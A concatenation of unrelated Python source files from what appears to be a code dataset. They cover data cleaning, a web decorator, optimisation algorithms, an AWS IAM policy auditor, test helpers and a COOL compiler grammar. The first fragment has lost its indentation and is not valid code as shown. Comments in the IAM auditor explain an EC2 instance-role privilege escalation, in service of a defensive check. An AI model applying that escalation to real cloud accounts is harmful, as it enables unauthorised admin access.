most_popular_values = {col: df[col].value_counts().index[0] for col in CATEGORICAL_COLS}
logging.info(u"Filling NA with average: %s", averages)
df = df.fillna(averages)
logging.info(u"Filling NA with zeros: %s", zeros)
df = df.fillna(zeros)
logging.info(u"Filling NA with most populars: %s", most_popular_values)
df = df.fillna(most_popular_values)
df[INT_COLS] = df[INT_COLS].astype(int)
logging.info(u"Before cleaning NA: %s", df.shape)
df = df.dropna(subset=NOT_NA_COLS)
logging.info(u"After cleaning NA: %s", df.shape)
if pd.isnull(df.values).any():
logging.error(u"NA values left in df")
return df
def fill_missed_breakpoints(df):
df = df[pd.notnull(df.breakpoint) | pd.notnull(df.zone_name)]
logging.info(u"Bookings having breakpoint or zone_name: %s", df.shape[0])
logging.info(u"Filling missing breakpoints: %s", df[pd.isnull(df.breakpoint)].shape[0])
df.breakpoint[pd.isnull(df.breakpoint)] = df[pd.isnull(df.breakpoint)].sdate.apply(get_breakpoint)
logging.info(u"Left NA breakpoints: %s", df[pd.isnull(df.breakpoint)].shape[0])
return df.drop(u'zone_name', axis=1)
def main():
check_data(args.input_csv, args.input_csv_delimiter)
df = raw_data_to_df(args.input_csv, args.input_csv_delimiter)
original_columns = df.columns
logging.info(u"DF initial shape: %s", df.shape)
df = df.drop(COLS_TO_DROP, axis=1)
df = canonize_datetime(df, DATE_COLS)
df = fill_missed_breakpoints(df)
df = fine_tune_df(df)
processed_columns = set(df.columns).union(COLS_TO_DROP + [u'zone_name'])
check_processed_columns(processed_columns, original_columns)
logging.info(u"Dumping data to: %s", args.output_csv)
df.to_csv(args.output_csv, index=False)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('-i', required=True, dest="input_csv",
help=u'Path to a csv file with bookings')
parser.add_argument('--id', default=";", dest="input_csv_delimiter",
help=u"The input file's delimiter. Default: ';'")
parser.add_argument('-o', default="bookings.csv", dest="output_csv",
help=u'Path to an output file. Default: booking.csv')
parser.add_argument("--log-level", default='INFO', dest="log_level",
choices=['DEBUG', 'INFO', 'WARNINGS', 'ERROR'], help=u"Logging level")
args = parser.parse_args()
logging.basicConfig(
format='%(asctime)s %(levelname)s:%(message)s', stream=sys.stdout, level=getattr(logging, args.log_level)
)
main()
| 2.390625 | 2 |
src/api/wish.py | PKU-GeekGame/gs-backend | 7 | 5551 | from sanic import Blueprint, Request, HTTPResponse, response
from sanic.models.handler_types import RouteHandler
from functools import wraps
from inspect import isawaitable
from typing import Callable, Dict, Any, Union, Awaitable, List, Optional
ACCEPTED_WISH_VERS = ['wish.alpha.v1']
WishHandler = Callable[..., Union[Dict[str, Any], Awaitable[Dict[str, Any]]]]
def wish_endpoint(bp: Blueprint, uri: str, *, methods: Optional[List[str]] = None) -> Callable[[WishHandler], RouteHandler]:
if methods is None:
methods = ['POST']
def decorator(fn: WishHandler) -> RouteHandler:
@wraps(fn)
async def wrapped(req: Request, *args: Any, **kwargs: Any) -> HTTPResponse:
v = req.headers.get('X-Wish-Version', '(none)')
if v not in ACCEPTED_WISH_VERS:
return response.json({
'error': 'WISH_VERSION_MISMATCH',
                'error_msg': f'Front-end version {v} is not up to date',
})
retval_ = fn(req, *args, **kwargs)
retval = (await retval_) if isawaitable(retval_) else retval_
return response.json({
'error': None, # may be overridden by retval
**retval,
})
return bp.route(uri, methods)(wrapped) # type: ignore
return decorator | 2.078125 | 2 |
scripts/venv/lib/python2.7/site-packages/cogent/maths/function_optimisation.py | sauloal/cnidaria | 3 | 5552 | #!/usr/bin/env python
"""Algorithms for function optimisation
great_deluge() is a hillclimbing algorithm based on:
Gunter Dueck: New Optimization Heuristics, The Great Deluge Algorithm
and the Record-to-Record Travel. Journal of Computational Physics, Vol.
104, 1993, pp. 86 - 92
ga_evolve() is a basic genetic algorithm in which all internal functions can
be overridden
NOTE: both optimisation functions are generators.
"""
from numpy.random import normal
__author__ = "<NAME> and <NAME>"
__copyright__ = "Copyright 2007-2012, The Cogent Project"
__credits__ = ["<NAME>", "<NAME>"]
__license__ = "GPL"
__version__ = "1.5.3"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Production"
def _simple_breed(best, num, mutation_rate, random_f):
"""Returns num copies of parent with mutation_rate changes"""
result = []
score, parent = best
for child_number in range(num):
if random_f() <= mutation_rate:
child = parent.mutate()
result.append(child)
else:
result.append(parent)
return result
def _simple_score(child, target):
"""Returns the childs score as defined by the childs scoring function"""
return child.score(target)
def _simple_init(parent, num):
"""Creates a list parent copies"""
return [parent.copy() for i in range(num)]
def _simple_select(population, scores):
"""Returns a tuple: (best_score, best_child)"""
scored = zip(scores, population)
scored.sort()
return scored[0]
def great_deluge(a, step_factor=500, max_iter=100, max_total_iters=1000):
"""This generator makes random variations of the object a to minimize cost.
Yields are performed at the end of each iteration and a tuple containing
((iter_count, total_iters), a) is returned. iter_count is used to
kill the while loop in the event that no new objects are found with a
better cost. iter_count gets reset each time an object with a better
cost is found. total_iters will kill the while loop when the total
number of iterations through the loop reaches max_total_iters
Object a must implement methods cost() and perturb() for evaluating
the score and making mutations respectively. Usually, you'll want to
write a wrapper that passes these through to methods of an internal
data object, or functions acting on that object.
"""
water_level = curr_cost = a.cost() # can't be worse than initial guess
step_size = abs(water_level)/step_factor
iter_count = 0
total_iters = 0
while iter_count < max_iter and total_iters < max_total_iters:
new = a.perturb()
new_cost = new.cost()
if new_cost < water_level:
if new_cost < curr_cost:
water_level = max(curr_cost, water_level - step_size)
iter_count = 0 # WARNING: iter_count is reset here!
curr_cost = new_cost
a = new
else:
iter_count += 1
yield ((iter_count, total_iters), a)
total_iters += 1
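# Example added for illustration (not part of the original cogent module):
# a toy object exposing the cost()/perturb() interface that great_deluge()
# expects. The _DemoGuess class and the target constant 42.0 are assumptions.
def _demo_great_deluge():
    """Minimal great_deluge() usage sketch; returns the best object found."""
    class _DemoGuess(object):
        def __init__(self, value):
            self.value = value
        def cost(self):
            return abs(self.value - 42.0) # distance from an arbitrary target
        def perturb(self):
            return _DemoGuess(self.value + normal(0, 1)) # random neighbour
    best = None
    for (_iters, _total), best in great_deluge(_DemoGuess(0.0), max_total_iters=200):
        pass
    return best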
def ga_evolve(parent, target, num, mutation_rate=0.01, score_f=_simple_score,
breed_f=_simple_breed, select_f=_simple_select,
init_f=_simple_init, random_f=normal, max_generations=1000):
"""Evolves a population based on the parent to the target
Parent must implement methods copy(), mutate(), and score(target) to be
used with the simple default functions.
Yields are performed at the end of each iteration and contain the tuple
(generation, best). The default functions return the tuple
(generation, (best_score, best_obj)).
Arguments:
parent: Object to create initial population from.
target: The goal of the evolution.
num: Population size.
mutation_rate: Rate at which objects in the population are mutated.
score_f: Function to score the object against the target.
breed_f: Function to create new population with mutations
select_f: Function to select best object(s) from the population
random_f: Function to be used in breed_f
max_generations: Kills while loop if max_generations is reached
Overload default functions:
score_f: Must take an object and a target score. Returns objects
score.
breed_f: Must take a tuple containing (scores, objects), the size of
population, a mutation rate and random function to use.
Returns a list containing the initial population. Default
function takes only the best object, but this may not be
desired behavior.
select_f: Must take a population and scores. Returns a tuple
containing the best scores and objects in the population.
Default function returns only the best score and object.
init_f: Must take an object and the size of the population. Returns
a list containing the starting population
"""
generation = 0
population = init_f(parent, num)
while generation < max_generations:
scores = [score_f(child, target) for child in population]
best = select_f(population, scores)
population = breed_f(best, num, mutation_rate, random_f)
yield (generation, best)
generation += 1
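# Example added for illustration (not part of the original cogent module):
# a toy parent implementing copy()/mutate()/score(target) so ga_evolve() can
# run with its default helper functions. _DemoSeq and its integer encoding
# are assumptions made for this sketch.
def _demo_ga_evolve():
    """Minimal ga_evolve() usage sketch; returns (best_score, best_object)."""
    class _DemoSeq(object):
        def __init__(self, values):
            self.values = list(values)
        def copy(self):
            return _DemoSeq(self.values)
        def mutate(self):
            child = self.copy()
            child.values[0] += 1 # trivial mutation
            return child
        def score(self, target):
            return abs(sum(self.values) - target) # lower is better
    best = None
    for _generation, best in ga_evolve(_DemoSeq([0, 0]), target=10, num=20,
                                       max_generations=50):
        pass
    return best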
| 3.140625 | 3 |
collect_policies.py | jonathanbglass/parallel_prowler | 3 | 5553 | import argparse
import boto3
import json
import logging
import os
from progressbar import ProgressBar
import sys
"""
Collects IAM Policies
Evaluates policies looking for badness (*.*, Effect:Allow + NotAction)
Need to add more tests/use cases
"""
def get_policies(profile):
session = boto3.session.Session(profile_name=profile)
myiam = session.client('iam')
marker = None
allPolicies = []
passcount = 1
while True:
pbar = ProgressBar('Collecting Policies')
print("Policy Collection, Pass Number: {}".format(passcount))
passcount += 1
if marker:
response_iterator = myiam.list_policies(OnlyAttached=True,
Marker=marker)
else:
response_iterator = myiam.list_policies(OnlyAttached=True)
for p in pbar(response_iterator['Policies']):
polVers = myiam.get_policy_version(
PolicyArn=p['Arn'], VersionId=p['DefaultVersionId'])
mypol = {'Policy': p, 'PolicyVersion': polVers['PolicyVersion']}
allPolicies.append(mypol)
pfl = open(os.path.join('policies/', p['PolicyName']+'.json'), 'w')
pfl.write(json.dumps(mypol, default=str, indent=4))
pfl.close()
ae = myiam.list_entities_for_policy(PolicyArn=p['Arn'])
pfl = open(os.path.join('attachedentities/',
p['PolicyName']+'.json'), 'w')
pfl.write(json.dumps(ae, default=str, indent=4))
pfl.close()
try:
marker = response_iterator['Marker']
except KeyError:
break
print("\nTotal Policies: {}".format(len(allPolicies)))
pbar = ProgressBar('\tChecking for Dangerous Policies')
for p in pbar(allPolicies):
# This section looks for bad/dangerous patterns
# Pattern 1: Allow *.*
# AWSLambdaRole {
# 'Version': '2012-10-17',
# 'Statement': [
# {'Effect': 'Allow',
# 'Action': '*',
# 'Resource': ['*']
# }
# ]
# }
try:
q = p['PolicyVersion']['Document']['Statement'][0]
except Exception as e:
print("Problem parsing this policy: {}".format(p))
logging.debug("Problem parsing this policy: {}".format(p))
print(e)
continue
try:
if (q['Effect'] == "Allow" and '*' in q['Resource']
and '*' in q['Action']):
print("Review Dangerous Policy: {} -> {}".format(
p['Policy']['PolicyName'],
p['PolicyVersion']['Document']))
except Exception as e:
pass
# Pattern 2: Allow: *, NotAction
# {'Version': '2012-10-17',
# 'Statement': [
# {
# 'Effect': 'Allow',
# 'NotAction': ['iam:*', 'organizations:*', 'account:*'],
# 'Resource': '*'
# },
# {
# 'Effect': 'Allow',
# 'Action': [ 'iam:CreateServiceLinkedRole',
# 'iam:DeleteServiceLinkedRole',
# 'iam:ListRoles',
# 'organizations:DescribeOrganization',
# 'account:ListRegions'
# ],
# 'Resource': '*'
# }
# ]}
# This policy blacklists all 'iam:*', 'organizations:*', and
# 'accounts:*' with the NotAction. Then it grants specific
# access in the next stanza ('iam:ListRoles', etc)
# The fatal flaw is that it grants access to everything else,
# like lambda or ec2 because of the "Allow" in the first stanza.
# This user can create an EC2 instance, attach an admin role to
# it, and login and give themselves access to Admin. Instance
# privilege escalation.
try:
if (q['NotAction'] and q['Effect'] == 'Allow'
and q['Resource'] == '*'):
print("Review Suspect Policy: {} -> {}".format(
p['Policy']['PolicyName'],
p['PolicyVersion']['Document']))
except Exception as e:
pass
return
def check_args_creds(args):
# handle profiles / authentication / credentials
workingCreds = False
global logging
global workingProfiles
workingProfiles = []
if not args.profile:
logging.info("Using AWS Default Profile")
if (not check_profile("default")):
logging.error("Default credentials not working.")
print("Default credentials not working.")
quit()
else:
workingProfiles.append("default")
workingCreds = True
if args.profile and args.profile is not None:
logging.info("Using " + args.profile + " Profile")
if (not check_profile(args.profile)):
logging.error("Profile " + args.profile + " not working")
exit(1)
else:
logging.info("Profile " + args.profile + " working")
workingProfiles.append(args.profile)
workingCreds = True
return args.profile
def check_profile(profile):
global logging
try:
if(profile == "default"):
client = boto3.session.Session()
else:
logging.info("Testing profile: " + profile)
client = boto3.session.Session(profile_name=profile)
except Exception as e:
logging.error("Error connecting: ")
logging.error(e)
return False
try:
iam = client.client('iam')
response = iam.list_users()
except Exception as e:
logging.error("Error listing users: ")
logging.error(e)
return False
if len(response['Users']) == 0:
logging.info("No users")
if len(response) > 0:
usercnt = len(response['Users'])
if(usercnt > 1):
userresp = " Users"
else:
userresp = " User"
logging.info(str(usercnt) + userresp)
return True
def setup_args(parser):
parser.add_argument("-p", "--profile",
help="AWS Profile")
parser.add_argument("-l", "--log",
help="Log Level")
def main():
global logging
parser = argparse.ArgumentParser()
setup_args(parser)
global args
args = parser.parse_args()
if args.log and args.log.upper() == "DEBUG":
loglevel = "DEBUG"
else:
loglevel = "INFO"
logging.basicConfig(filename='policyAssessment.log',
format='%(levelname)s:%(message)s',
level=loglevel)
profile = check_args_creds(args)
get_policies(profile)
if __name__ == "__main__":
# execute only if run as a script
main()
| 2.296875 | 2 |
test/molecule-role/molecule/integrations/tests/test_nagios.py | StackVista/stackstate-agent | 2 | 5554 | import json
import os
import re
from testinfra.utils.ansible_runner import AnsibleRunner
import util
testinfra_hosts = AnsibleRunner(os.environ['MOLECULE_INVENTORY_FILE']).get_hosts('agent-integrations')
def _get_key_value(tag_list):
for key, value in (pair.split(':', 1) for pair in tag_list):
yield key, value
def _component_data(json_data, type_name, external_id_assert_fn, tags_assert_fn):
for message in json_data["messages"]:
p = message["message"]["TopologyElement"]["payload"]
if "TopologyComponent" in p and \
p["TopologyComponent"]["typeName"] == type_name and \
external_id_assert_fn(p["TopologyComponent"]["externalId"]):
data = json.loads(p["TopologyComponent"]["data"])
if tags_assert_fn(dict(_get_key_value(data["tags"]))):
return data
return None
def test_nagios_mysql(host):
def assert_topology():
topo_url = "http://localhost:7070/api/topic/sts_topo_process_agents?limit=1500"
data = host.check_output('curl "{}"'.format(topo_url))
json_data = json.loads(data)
with open("./topic-nagios-topo-process-agents.json", 'w') as f:
json.dump(json_data, f, indent=4)
external_id_pattern = re.compile(r"urn:container:/agent-integrations:.*")
components = [
{
"assertion": "Should find the nagios container",
"type": "container",
"external_id": lambda e_id: external_id_pattern.findall(e_id),
"tags": lambda t: t["container_name"] == "ubuntu_nagios_1"
},
{
"assertion": "Should find the mysql container",
"type": "container",
"external_id": lambda e_id: external_id_pattern.findall(e_id),
"tags": lambda t: t["container_name"] == "ubuntu_mysql_1"
}
]
for c in components:
print("Running assertion for: " + c["assertion"])
assert _component_data(
json_data=json_data,
type_name=c["type"],
external_id_assert_fn=c["external_id"],
tags_assert_fn=c["tags"],
) is not None
util.wait_until(assert_topology, 30, 3)
def test_container_metrics(host):
url = "http://localhost:7070/api/topic/sts_multi_metrics?limit=1000"
def wait_for_metrics():
data = host.check_output("curl \"%s\"" % url)
json_data = json.loads(data)
with open("./topic-nagios-sts-multi-metrics.json", 'w') as f:
json.dump(json_data, f, indent=4)
def get_keys(m_host):
return set(
''.join(message["message"]["MultiMetric"]["values"].keys())
for message in json_data["messages"]
if message["message"]["MultiMetric"]["name"] == "convertedMetric" and
message["message"]["MultiMetric"]["host"] == m_host
)
expected = {'nagios.http.size', 'nagios.ping.pl', 'nagios.http.time', 'nagios.current_load.load15',
'nagios.swap_usage.swap', 'nagios.host.pl', 'nagios.root_partition', 'nagios.current_users.users',
'nagios.current_load.load1', 'nagios.host.rta', 'nagios.ping.rta', 'nagios.current_load.load5',
'nagios.total_processes.procs'}
assert all([expectedMetric for expectedMetric in expected if expectedMetric in get_keys("agent-integrations")])
util.wait_until(wait_for_metrics, 180, 3)
| 2.25 | 2 |
erudition/util.py | papsebestyen/erudition | 0 | 5555 | import os
import sys
from contextlib import contextmanager
from invoke import UnexpectedExit
def git_commit(c, addstr, msg):
try:
c.run("git config --get user.email")
c.run("git config --get user.name")
except UnexpectedExit:
c.run('git config --local user.email "<EMAIL>"')
c.run('git config --local user.name "CI/CD"')
c.run(f'git add {addstr} && git commit -m "{msg}"')
@contextmanager
def cd_into(dirpath):
wd = os.getcwd()
os.chdir(dirpath)
sys.path.insert(0, str(dirpath))
yield
os.chdir(wd)
sys.path.pop(0)
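# Usage sketch added for illustration (not part of the original module); the
# "docs" directory name is an assumption.
def _example_cd_into():
    with cd_into("docs"):
        # cwd and sys.path point at ./docs only inside this block
        print(os.getcwd())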
| 2.28125 | 2 |
python3/distortion_correct_aksk_demo.py | MeekoI/ais-sdk | 0 | 5556 | <filename>python3/distortion_correct_aksk_demo.py
# -*- coding:utf-8 -*-
from ais_sdk.utils import encode_to_base64
from ais_sdk.utils import decode_to_wave_file
from ais_sdk.distortion_correct import distortion_correct_aksk
from ais_sdk.utils import init_global_env
import json
if __name__ == '__main__':
#
# access moderation distortion correct.post data by ak,sk
#
app_key = '*************'
app_secret = '************'
init_global_env(region='cn-north-1')
demo_data_url = 'https://ais-sample-data.obs.cn-north-1.myhuaweicloud.com/vat-invoice.jpg'
#call interface use the url correction is true means do not correction
result = distortion_correct_aksk(app_key, app_secret, "", demo_data_url, True)
result_obj = json.loads(result)
if result_obj['result']['data'] != '':
decode_to_wave_file(result_obj['result']['data'], 'data/moderation-distortion-aksk-1.png')
else:
print(result)
# call interface use the file
result = distortion_correct_aksk(app_key, app_secret, encode_to_base64('data/moderation-distortion.jpg'), '', True)
result_obj = json.loads(result)
if result_obj['result']['data'] != '':
decode_to_wave_file(result_obj['result']['data'], 'data/moderation-distortion-aksk-2.png')
else:
print(result) | 2.5 | 2 |
exercise/migrations/0016_auto_20191025_1624.py | Arpit8081/Phishtray_Edited_Version | 2 | 5557 | <filename>exercise/migrations/0016_auto_20191025_1624.py
# Generated by Django 2.2.6 on 2019-10-25 16:24
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('exercise', '0015_exerciseemailproperties_date_received'),
]
operations = [
migrations.AlterField(
model_name='exercise',
name='copied_from',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.DO_NOTHING, to='exercise.Exercise'),
),
]
| 1.3125 | 1 |
release/stubs.min/Autodesk/Revit/DB/__init___parts/GeomCombinationSet.py | YKato521/ironpython-stubs | 0 | 5558 | class GeomCombinationSet(APIObject, IDisposable, IEnumerable):
"""
A set that contains GeomCombination objects.
GeomCombinationSet()
"""
def Clear(self):
"""
Clear(self: GeomCombinationSet)
        Removes every GeomCombination item from the set, rendering it empty.
"""
pass
def Contains(self, item):
"""
Contains(self: GeomCombinationSet,item: GeomCombination) -> bool
        Tests for the existence of a GeomCombination within the set.
item: The element to be searched for.
Returns: The Contains method returns True if the GeomCombination is within the set,
otherwise False.
"""
pass
def Dispose(self):
""" Dispose(self: GeomCombinationSet,A_0: bool) """
pass
def Erase(self, item):
"""
Erase(self: GeomCombinationSet,item: GeomCombination) -> int
Removes a specified GeomCombination from the set.
item: The GeomCombination to be erased.
Returns: The number of GeomCombinations that were erased from the set.
"""
pass
def ForwardIterator(self):
"""
ForwardIterator(self: GeomCombinationSet) -> GeomCombinationSetIterator
Retrieve a forward moving iterator to the set.
Returns: Returns a forward moving iterator to the set.
"""
pass
def GetEnumerator(self):
"""
GetEnumerator(self: GeomCombinationSet) -> IEnumerator
Retrieve a forward moving iterator to the set.
Returns: Returns a forward moving iterator to the set.
"""
pass
def Insert(self, item):
"""
Insert(self: GeomCombinationSet,item: GeomCombination) -> bool
Insert the specified element into the set.
item: The GeomCombination to be inserted into the set.
Returns: Returns whether the GeomCombination was inserted into the set.
"""
pass
def ReleaseManagedResources(self, *args):
""" ReleaseManagedResources(self: APIObject) """
pass
def ReleaseUnmanagedResources(self, *args):
""" ReleaseUnmanagedResources(self: GeomCombinationSet) """
pass
def ReverseIterator(self):
"""
ReverseIterator(self: GeomCombinationSet) -> GeomCombinationSetIterator
Retrieve a backward moving iterator to the set.
Returns: Returns a backward moving iterator to the set.
"""
pass
def __enter__(self, *args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self, *args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self, *args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __iter__(self, *args):
""" __iter__(self: IEnumerable) -> object """
pass
IsEmpty = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Test to see if the set is empty.
Get: IsEmpty(self: GeomCombinationSet) -> bool
"""
Size = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Returns the number of GeomCombinations that are in the set.
Get: Size(self: GeomCombinationSet) -> int
"""
| 2.75 | 3 |
rainbow/datasources/cfn_datasource.py | omribahumi/rainbow | 35 | 5559 | <reponame>omribahumi/rainbow<filename>rainbow/datasources/cfn_datasource.py
from rainbow.cloudformation import Cloudformation
from base import DataSourceBase
__all__ = ['CfnOutputsDataSource', 'CfnResourcesDataSource', 'CfnParametersDataSource']
class CfnDataSourceBase(DataSourceBase):
def __init__(self, data_source):
super(CfnDataSourceBase, self).__init__(data_source)
stack_name = data_source
region = Cloudformation.default_region
if ':' in data_source:
region, stack_name = data_source.split(':', 1)
cfn_connection = Cloudformation(region)
if not cfn_connection:
raise Exception('Invalid region %r' % (region,))
self.stack = cfn_connection.describe_stack(stack_name)
class CfnOutputsDataSource(CfnDataSourceBase):
datasource_name = 'cfn_outputs'
def __init__(self, data_source):
super(CfnOutputsDataSource, self).__init__(data_source)
self.data = {i.key: i.value for i in self.stack.outputs}
class CfnResourcesDataSource(CfnDataSourceBase):
datasource_name = 'cfn_resources'
def __init__(self, data_source):
super(CfnResourcesDataSource, self).__init__(data_source)
self.data = {r.logical_resource_id: r.physical_resource_id for r in self.stack.describe_resources()}
class CfnParametersDataSource(CfnDataSourceBase):
datasource_name = 'cfn_parameters'
def __init__(self, data_source):
super(CfnParametersDataSource, self).__init__(data_source)
self.data = {p.key: p.value for p in self.stack.parameters}
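# Usage sketch added for illustration (not part of the original module); the
# region and stack name below are assumptions.
def _example_usage():
    outputs = CfnOutputsDataSource('us-east-1:my-stack')
    return outputs.data # dict of {output key: output value}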
| 2.234375 | 2 |
epio_commands/management/commands/epio_flush_redis.py | idan/pypostbin | 2 | 5560 | import redis
from bundle_config import config
from django.core.management.base import NoArgsCommand
class Command(NoArgsCommand):
help = 'Flushes all keys in redis.'
def handle_noargs(self, **options):
r = redis.Redis(host=config['redis']['host'], port=int(config['redis']['port']), password=config['redis']['password'])
r.flushall()
print "All redis keys flushed."
| 2.171875 | 2 |
python/flexflow_cffi_build.py | zmxdream/FlexFlow | 455 | 5561 | <filename>python/flexflow_cffi_build.py
#!/usr/bin/env python
# Copyright 2020 Stanford University, Los Alamos National Laboratory
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import, division, print_function, unicode_literals
import argparse
import os
import subprocess
def find_flexflow_header(ffhome_dir):
def try_prefix(prefix_dir):
flexflow_ch_path = os.path.join(prefix_dir, 'python', 'flexflow_c.h')
flexflow_cxxh_path = os.path.join(prefix_dir, 'include', 'model.h')
if os.path.exists(flexflow_ch_path) and os.path.exists(flexflow_cxxh_path):
flexflow_cxxh_dir = os.path.join(prefix_dir, 'include')
return flexflow_cxxh_dir, flexflow_ch_path
result = try_prefix(ffhome_dir)
if result:
return result
raise Exception('Unable to locate flexflow_c.h and flexflow.h header file')
def build(output_dir, libname, ffhome_dir):
flexflow_cxxh_dir, flexflow_ch_path = find_flexflow_header(ffhome_dir)
header = subprocess.check_output(['gcc', '-I', flexflow_cxxh_dir, '-E', '-P', flexflow_ch_path]).decode('utf-8')
with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'flexflow_cffi_header.py.in')) as f:
content = f.read()
content = content.format(header=repr(header), libname=repr(libname))
if output_dir is None:
output_dir = os.path.dirname(os.path.realpath(__file__))
with open(os.path.join(output_dir, 'flexflow_cffi_header.py'), 'wb') as f:
f.write(content.encode('utf-8'))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--ffhome-dir', required=True)
parser.add_argument('--libname', required=True)
parser.add_argument('--output-dir', required=False)
args = parser.parse_args()
build(args.output_dir, args.libname, args.ffhome_dir)
| 2.1875 | 2 |
gaphor/plugins/xmiexport/__init__.py | tuxcell/gaphor | 0 | 5562 | <filename>gaphor/plugins/xmiexport/__init__.py
"""This plugin extends Gaphor with XMI export functionality."""
import logging
from gaphor.abc import ActionProvider, Service
from gaphor.core import action, gettext
from gaphor.plugins.xmiexport import exportmodel
from gaphor.ui.filedialog import FileDialog
logger = logging.getLogger(__name__)
class XMIExport(Service, ActionProvider):
def __init__(self, element_factory, file_manager, export_menu):
self.element_factory = element_factory
self.file_manager = file_manager
export_menu.add_actions(self)
def shutdown(self):
pass
@action(
name="file-export-xmi",
label=gettext("Export to XMI"),
tooltip=gettext("Export model to XMI (XML Model Interchange) format"),
)
def execute(self):
filename = self.file_manager.filename
filename = filename.replace(".gaphor", ".xmi") if filename else "model.xmi"
file_dialog = FileDialog(
gettext("Export model to XMI file"), action="save", filename=filename
)
filename = file_dialog.selection
if filename and len(filename) > 0:
logger.debug(f"Exporting XMI model to: {filename}")
export = exportmodel.XMIExport(self.element_factory)
try:
export.export(filename)
except Exception as e:
logger.error(f"Error while saving model to file {filename}: {e}")
| 2.21875 | 2 |
tests/utils.py | btk15049/online-judge-tools | 0 | 5563 | <gh_stars>0
import contextlib
import os
import pathlib
import subprocess
import sys
import tempfile
@contextlib.contextmanager
def chdir(path):
cwd = os.getcwd()
try:
os.chdir(path)
yield
finally:
os.chdir(cwd)
def prepare_files(files):
for f in files:
path = pathlib.Path(f['path'])
path.parent.mkdir(parents=True, exist_ok=True)
with open(str(path), 'w') as fh:
fh.write(f['data'])
if f.get('executable', False):
path.chmod(0o755)
@contextlib.contextmanager
def sandbox(files):
with tempfile.TemporaryDirectory() as tempdir:
with chdir(tempdir):
prepare_files(files)
yield tempdir
def get_oj_exe():
oj_exe = os.environ.get('TEST_OJ_EXE')
if oj_exe is not None:
return [str(pathlib.Path(oj_exe).resolve())]
else:
return [sys.executable, '-m', 'onlinejudge._implementation.main']
def run(args, *, env=None, check=False, oj_exe=get_oj_exe()):
# oj_exe should be evaluated out of sandboxes
env = env or dict(os.environ)
env['PYTHONPATH'] = str(pathlib.Path(__file__).parent.parent) # this is required to run in sandboxes
return subprocess.run(oj_exe + args, stdout=subprocess.PIPE, stderr=sys.stderr, env=env, check=check)
def run_in_sandbox(args, files):
with sandbox(files) as tempdir:
proc = run(args)
return {
'proc': proc,
'tempdir': tempdir,
}
def cat():
if os.name == 'nt':
return '{} -c "import sys; sys.stdout.buffer.write(sys.stdin.buffer.read())"'.format(sys.executable)
else:
return 'cat'
def sleep_1sec():
if os.name == 'nt':
return '{} -c "import time; time.sleep(1)"'.format(sys.executable)
else:
return 'sleep 1.0'
def python_c(cmd):
assert '"' not in cmd
return '{} -c "{}"'.format(sys.executable, cmd)
def python_script(path):
assert '"' not in path
return '{} "{}"'.format(sys.executable, path)
def is_logged_in(service, memo={}):
# functools.lru_cache is unusable since Service are unhashable
url = service.get_url()
if url not in memo:
proc = run(['login', '--check', url])
memo[url] = proc.returncode == 0
return memo[url]
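# Usage sketch added for illustration (not part of the original module); the
# file layout and the '--version' argument are assumptions.
def _example_run_in_sandbox():
    files = [{'path': 'test/sample-1.in', 'data': 'hello\n'}]
    result = run_in_sandbox(['--version'], files)
    return result['proc'].returncode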
| 2.375 | 2 |
git_operation.py | zerzerzerz/Computer-Virus | 0 | 5564 | <gh_stars>0
import os
commit_string = "选择data的前多少个维度参与训练"
not_add = ['results', 'data', 'weights']
for item in os.listdir():
if item in not_add:
# print(item)
continue
else:
os.system(f"git add {item}")
os.system(f'git commit -m "{commit_string}"')
os.system("git push origin main") | 2.546875 | 3 |
src/cool_grammar.py | peanut-butter-jellyyy/cool-compiler-2021 | 0 | 5565 | <gh_stars>0
from src.cmp.pycompiler import Grammar
from src.ast_nodes import (
ProgramNode,
ClassDeclarationNode,
FuncDeclarationNode,
AttrDeclarationNode,
IfNode,
WhileNode,
LetNode,
CaseNode,
IsvoidNode,
AssignNode,
VarDeclarationNode,
CaseItemNode,
NotNode,
LessNode,
LessEqualNode,
EqualNode,
PlusNode,
MinusNode,
StarNode,
DivNode,
NegNode,
InstantiateNode,
BlockNode,
CallNode,
ConstantNumNode,
VariableNode,
BooleanNode,
StringNode,
)
def define_cool_grammar(print_grammar=False):
# grammar
G = Grammar()
# non-terminals
program = G.NonTerminal("<program>", startSymbol=True)
class_list, def_class = G.NonTerminals("<class-list> <def-class>")
feature_list, def_attr, def_func = G.NonTerminals(
"<feature-list> <def-attr> <def-func>"
)
param_list, param = G.NonTerminals("<param-list> <param>")
expr, comp, arith, term, factor, element, atom = G.NonTerminals(
"<expr> <comp> <arith> <term> <factor> <element> <atom>"
)
identifiers_list, identifier_init = G.NonTerminals("<ident-list> <ident-init>")
block, case_block, case_item = G.NonTerminals("<block> <case-block> <case-item>")
func_call, arg_list = G.NonTerminals("<func-call> <arg-list>")
# terminals
classx, inherits, notx, isvoid = G.Terminals("class inherits not isvoid")
let, inx = G.Terminals("let in")
ifx, then, elsex, fi = G.Terminals("if then else fi")
whilex, loop, pool = G.Terminals("while loop pool")
case, of, esac = G.Terminals("case of esac")
semi, colon, comma, dot, opar, cpar, ocur, ccur, at, larrow, rarrow = G.Terminals(
"; : , . ( ) { } @ <- =>"
)
equal, plus, minus, star, div, less, equal, lesseq, neg = G.Terminals(
"= + - * / < = <= ~"
)
idx, num, new, string, true, false = G.Terminals("id int new string true false")
# productions
program %= class_list, lambda h, s: ProgramNode(s[1])
